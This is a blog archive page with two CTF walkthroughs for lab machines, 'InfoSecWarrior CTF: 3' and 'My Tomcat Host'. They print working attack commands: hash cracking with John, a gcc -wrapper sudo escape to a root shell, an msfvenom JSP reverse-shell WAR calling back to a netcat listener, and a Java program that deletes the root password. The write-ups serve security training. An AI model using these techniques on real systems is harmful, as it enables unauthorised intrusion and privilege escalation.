walkthrough Archives - Armour Infosec

InfoSecWarrior CTF: 3 Walkthrough

Armour Infosec — Thu, 09 Apr 2020 18:25:45 +0000

Here is the new challenge of InfoSecWarrior CTF: 3 Walkthrough by Infosec Warrior CTF 2020. The box is designed by Vishal Biswas aka CyberKnight. The goal is to gain the highest privileges and collect only 2 flags (user flag and root flag). According to author box consist WordPress developer configured the machine to work internally. But due to some miss-configuration WordPress is exposed to the outside world. Use your skills and get the root flag. So let us go.

Pentester Methodology

Network Scanning

Netdiscover
Nmap

Enumeration

Nikto
phpMyAdmin
John
SSH

Privilege Escalation

Sudo -l
gcc compilation

Network Scanning

We start with Netdiscover to obtain IP address as followed

#netdiscover -i vboxnet0
	 Currently scanning: 192.168.12.0/16   |   Screen View: Unique Hosts                                                                                                                            
                                                                                                                                                                                                
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102                                                                                                                                
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.2.2     08:00:27:a0:51:d5      1      42  PCS Systemtechnik GmbH                                                                                                                       
 192.168.2.17    08:00:27:a7:26:e1      1      60  PCS Systemtechnik GmbH

Got the machine Ip 192.168.2.17 and let us scan the Nmap.

#nmap -p- -A -O 192.168.2.17
Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-04-09 18:53 IST
Nmap scan report for 192.168.2.17
Host is up (0.00048s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d8:ad:48:16:27:f8:cc:99:3a:2f:db:c1:a9:d5:3a:d1 (RSA)
|   256 51:06:ab:78:61:f5:4c:03:a0:8f:01:27:f9:17:51:e7 (ECDSA)
|_  256 d5:63:58:ba:2a:d5:d2:17:cb:63:12:34:d6:cd:b6:b9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.3.2
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: TEST WORDPRESS – Just another WordPress site
MAC Address: 08:00:27:A7:26:E1 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/9%OT=22%CT=1%CU=44313%PV=Y%DS=1%DC=D%G=Y%M=080027%TM
OS:=5E8F21EA%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Enumeration

On visiting the web page there, we see a WordPress web site. But the WordPress website doesn’t work properly error here so we moved on our next step.

So I fired Nikto and found phpMyAdmin page.

#nikto -h http://192.168.2.17/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.2.17
+ Target Hostname: 192.168.2.17
+ Target Port: 80
+ Start Time: 2020-04-09 18:55:13 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: ; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site differently to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ Cookie goto created without the httponly flag
+ Cookie back created without the httponly flag
+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A WordPress installation was found.
+ /phpmyadmin/: phpMyAdmin directory found
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: WordPress login found
+ OSVDB-3092: /phpMyAdmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7916 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time: 2020-04-09 18:56:16 (GMT5.5) (63 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

so I logged in with credentials root: root. it was a success

We successfully login with the root MySQL database then I select the wpdb database on open the wp-user table and we see two user entries Krishna and user1 as shown in the image file.

I copy the users hash and save a text file and crack the hash using the john tool use the following command

john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:04 0.13% (ETA: 20:05:08) 0g/s 5444p/s 5444c/s 5444C/s sharpie1..alvina
0g 0:00:00:45 1.36% (ETA: 20:08:02) 0g/s 5109p/s 5109c/s 5109C/s 12062525..109109109
infosec					(?)
Session aborted

john --wordlist=/usr/share/wordlists/rockyou.txt user
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:04 0.13% (ETA: 20:05:08) 0g/s 5444p/s 5444c/s 5444C/s sharpie1..alvina
0g 0:00:00:45 23.36% (ETA: 20:08:02) 0g/s 5109p/s 5109c/s 5109C/s 12062525..109109109
user1					(?)
Session aborted

And we see WordPress hashes is cracked successfully and I try to login ssh using the WordPress credentials and us successful login with ssh Krishna shell. Krishna: infosec

#ssh krishna@192.168.2.17
The authenticity of host '192.168.2.17 (192.168.2.17)' can't be established.
ECDSA key fingerprint is SHA256:L8AFuzt5MRe4jDRpDukvoY4rrvpBMl49RbM0tbVdeVM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.17' (ECDSA) to the list of known hosts.
krishna@192.168.2.17's password: 
krishna@ck05:~$ id 
uid=1001(krishna) gid=1001(krishna) groups=1001(krishna)
krishna@ck05:~$ hostname
ck05
krishna@ck05:~$ whoami 
krishna

Got the Shell

Privilege Escalation

I ran the sudo -l command and I found Krishna has sudo permission to run a bash script as loopspell this script is compiler a #C language file using gcc using this command we privilege escalate this machine.

krishna@ck05:~$ sudo -l
Matching Defaults entries for krishna on ck05:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User krishna may run the following commands on ck05:
    (loopspell : ALL) NOPASSWD: /home/loopspell/code_compiler.sh
krishna@ck05:~$ sudo -u loopspell /home/loopspell/code_compiler.sh "-wrapper /bin/bash,-s ."
Code is being compiling ...
loopspell@ck05:~$ id 
uid=1002(loopspell) gid=1002(loopspell) groups=1002(loopspell)
loopspell@ck05:~$ hostname
ck05
loopspell@ck05:~$ whoami 
loopspell

The sudo -l command and we see sudoers filer entry /usr/bin/gcc and code_compiler.sh. using sudo I again run the privilege escalation command and we have a root shell target machine

loopspell@ck05:/home$ cd loopspell/
loopspell@ck05:/home/loopspell$ ls 
backup.c  backup.txt  code_compiler.sh	user.txt
loopspell@ck05:/home/loopspell$ cat user.txt 
a4e3fea7510e570f6964899eb764abdc
loopspell@ck05:/home/loopspell$ sudo -l
Matching Defaults entries for loopspell on ck05:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User loopspell may run the following commands on ck05:
    (ALL : ALL) /usr/bin/gcc
    (ALL : ALL) NOPASSWD: /home/loopspell/code_compiler.sh
loopspell@ck05:/home/loopspell$ sudo -l
Matching Defaults entries for loopspell on ck05:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User loopspell may run the following commands on ck05:
    (ALL : ALL) /usr/bin/gcc
    (ALL : ALL) NOPASSWD: /home/loopspell/code_compiler.sh
loopspell@ck05:/home/loopspell$ sudo /home/loopspell/code_compiler.sh 
Code is being compiling ...
gcc: fatal error: no input files
compilation terminated.
You can find your compiled code in /tmp/ directory.
loopspell@ck05:/home/loopspell$ sudo /home/loopspell/code_compiler.sh "-wrapper /bin/bash,-s ."
Code is being compiling ...
root@ck05:/home/loopspell# id 
uid=0(root) gid=0(root) groups=0(root)
root@ck05:/home/loopspell# hostname
ck05
root@ck05:/home/loopspell# whoami
root
root@ck05:/home/loopspell# passwd
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully
root@ck05:/home/loopspell# cd 
root@ck05:~# ls
msg.txt
root@ck05:~# cd /root/
root@ck05:/root# ls
root.txt
root@ck05:/root# cat root
cat: root: No such file or directory
root@ck05:/root# cat root.txt 
_________        ___.                 ____  __.      .__       .__     __    _______   .________
\_   ___ \___.__.\_ |__   ___________|    |/ _| ____ |__| ____ |  |___/  |_  \   _  \  |   ____/
/    \  \<   |  | | __ \_/ __ \_  __ \      <  /    \|  |/ ___\|  |  \   __\ /  /_\  \ |____  \ 
\     \___\___  | | \_\ \  ___/|  | \/    |  \|   |  \  / /_/  >   Y  \  |   \  \_/   \/       \
 \______  / ____| |___  /\___  >__|  |____|__ \___|  /__\___  /|___|  /__|    \_____  /______  /
        \/\/          \/     \/              \/    \/  /_____/      \/              \/       \/ 


flag = efa4c284b8e2a15674dfb369384c8bcf

This flag is a proof that you get the root shell.

Tag me on Twitter with @CyberKnight00 
root@ck05:/root#

Eureka !!!! got root.

The post InfoSecWarrior CTF: 3 Walkthrough appeared first on Armour Infosec.

My Tomcat Host Vulnhub Walkthrough

Armour Infosec — Thu, 09 Apr 2020 08:13:21 +0000

Hello everyone. This time I am sharing the walkthrough of a CTF machine designed by Akanksha Verma. This is a quick walkthrough of a vulnhub machine, My tomcat host. You can find this box on Infosec Warrior. According to there author it is a medium or intermediate level machine with good privilege escalation. So here we go.

Methodology applied :

Network Scanning

netdiscover
Nmap

Enumeration

Nmap
nikto
msfvenom

Privilege escalation

JAVA
sudo -l

Network Scanning

For scanning the network and obtaining the IP address of the box I used netdiscover. As shown below

#netdiscover -i vboxnet0
	Currently scanning: 192.168.18.0/16   |   Screen View: Unique Hosts                                                                                      
	2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102               
	_____________________________________________________________________________
	  IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
	-----------------------------------------------------------------------------
	192.168.2.2     08:00:27:a8:2f:81      1      42  PCS Systemtechnik GmbH      
	192.168.2.15    08:00:27:f7:24:84      1      60  PCS Systemtechnik GmbH

So the IP of the box is 192.168.2.15. let’s start with Nmap scanning

#nmap -p- -A -O  192.168.2.15
	Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-04-09 09:52 IST
	Nmap scan report for 192.168.2.15
	Host is up (0.00044s latency).
	Not shown: 65533 filtered ports
	PORT     STATE SERVICE VERSION
	22/tcp   open  ssh     OpenSSH 6.6.1 (protocol 2.0)
	| ssh-hostkey: 
	|   2048 61:16:10:91:bd:d7:6c:06:df:a2:b9:b5:b9:3b:dd:b6 (RSA)
	|   256 0e:a4:c9:fc:de:53:f6:1d:de:a9:de:e4:21:34:7d:1a (ECDSA)
	|_  256 ec:27:1e:42:65:1c:4a:3b:93:1c:a1:75:be:00:22:0d (ED25519)
	8080/tcp open  http    Apache Tomcat 9.0.31
	|_http-favicon: Apache Tomcat
	|_http-title: Apache Tomcat/9.0.31
	MAC Address: 08:00:27:F7:24:84 (Oracle VirtualBox virtual NIC)
	Device type: general purpose
	Running: Linux 3.X|4.X
	OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
	OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9
	Network Distance: 1 hop
	TRACEROUTE
	HOP RTT     ADDRESS
	1   0.44 ms 192.168.2.15

Enumeration :

We can see that there is an open port number 8080. So let us have a look there

Good there a Tomcat Host on the box. For more information, I fired nikto.

#nikto -h http://192.168.2.15:8080/
	
	- Nikto v2.1.6
	---------------------------------------------------------------------------
	+ Target IP:          192.168.2.15
	+ Target Hostname:    192.168.2.15
	+ Target Port:        8080
	+ Start Time:         2020-04-09 09:54:21 (GMT5.5)
	---------------------------------------------------------------------------
	+ Server: No banner retrieved
	+ The anti-clickjacking X-Frame-Options header is not present.
	+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
	+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
	+ No CGI Directories found (use '-C all' to force check all possible dirs)
	+ OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
	+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
	+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
	+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
	+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
	+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
	+ /axis2/axis2-web/HappyAxis.jsp: Apache Axis2 Happiness Page identified which includes internal application details.
	+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 'tomcat'). Apache Tomcat.
	+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
	+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
	+ /axis2/services/Version/getVersion: Apache Axis2 version identified.
	+ /axis2/services/listServices: Apache Axis2 WebServices identified.
	+ /axis2/axis2-web/index.jsp: Apache Axis2 Web Application identified.
	+ /host-manager/status: Default Tomcat Server Status interface found
	+ /manager/status: Tomcat Server Status interface found (pass protected)
	+ 8041 requests: 0 error(s) and 18 item(s) reported on remote host
	+ End Time:           2020-04-09 09:55:13 (GMT5.5) (52 seconds)
	---------------------------------------------------------------------------
	+ 1 host(s) tested

Out of all the things, the most important to us is that we have credentials for tomcat manager application, tomcat: tomcat. and the directory /manager/html page .

We were in the host and found there is a .war file upload option. So without wasting time I use msfvenom to generate a shell.war file

#msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.1 LPORT=1505 -f war > armour.war
	
	Payload size: 1106 bytes
	The final size of war file: 1106 bytes

Where LHOST = listener host IP && LPORT = listener port

And we have our payload ready, and we are all set to launch the attack. Upload this shell.war file and call it on the browser while having the listener on, on our machine

#nc -nlvp 1505
	
	listening on [any] 1505 ...
 	connect to [192.168.2.1] from (UNKNOWN) [192.168.2.15] 57094
	id
	uid=998(tomcat) gid=997(tomcat) groups=997(tomcat)
	hostname
	my_tomcat
	whoami
	tomcat

Got the shell of the user tomcat

Privilege Escalation:

Firstly I converted the shell into the interactive shell and I checked them for permissions on sudo command :

sh-4.2$ id
	uid=998(tomcat) gid=997(tomcat) groups=997(tomcat)
	sh-4.2$ sudo -l
	Matching Defaults entries for tomcat on this host:
	    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
	    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
	    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
	    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
	    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
	    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
	    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

	User tomcat may run the following commands on this host:
	    (ALL) NOPASSWD:
	    /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java

I see that we can run java command with sudo privileges. You can find the program from any place, I got it on stack overflow.

import java.io.BufferedReader;
	import java.io.InputStreamReader;

	public class armour {  //you have to change thew class same as file name
	    public static void main(String args[]) {
	        String s;
	        Process p;
	        try {
	            p = Runtime.getRuntime().exec("passwd -d root");  //the command you want to execute
	            BufferedReader br = new BufferedReader(
	                new InputStreamReader(p.getInputStream()));
	            while ((s = br.readLine()) != null)
	                System.out.println("line: " + s);
	            p.waitFor();
	            System.out.println ("exit: " + p.exitValue());
	            p.destroy();
	        } catch (Exception e) {}
	    }
	}

now I compile the code and executed it.

bash-4.2$ javac armour.java
	bash-4.2$ sudo java armour
	line: Removing password for user root.
	line: passwd: Success
	exit: 0
	bash-4.2$ su root
	[root@my_tomcat tmp]# id 
	uid=0(root) gid=0(root) groups=0(root)
	[root@my_tomcat tmp]# hostname 
	my_tomcat
	[root@my_tomcat tmp]# whoami 
	root
	[root@my_tomcat tmp]# uname -a
	Linux my_tomcat 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
	[root@my_tomcat tmp]# cd /root/
	[root@my_tomcat ~]# ls
	proof.txt
	[root@my_tomcat ~]# cat proof.txt 
	Best of Luck
	628435356e49f976bab2c04948d22fe4
	[root@my_tomcat ~]#

Boom !!! Eureka !!! I Got root …… and here is the flag.

The post My Tomcat Host Vulnhub Walkthrough appeared first on Armour Infosec.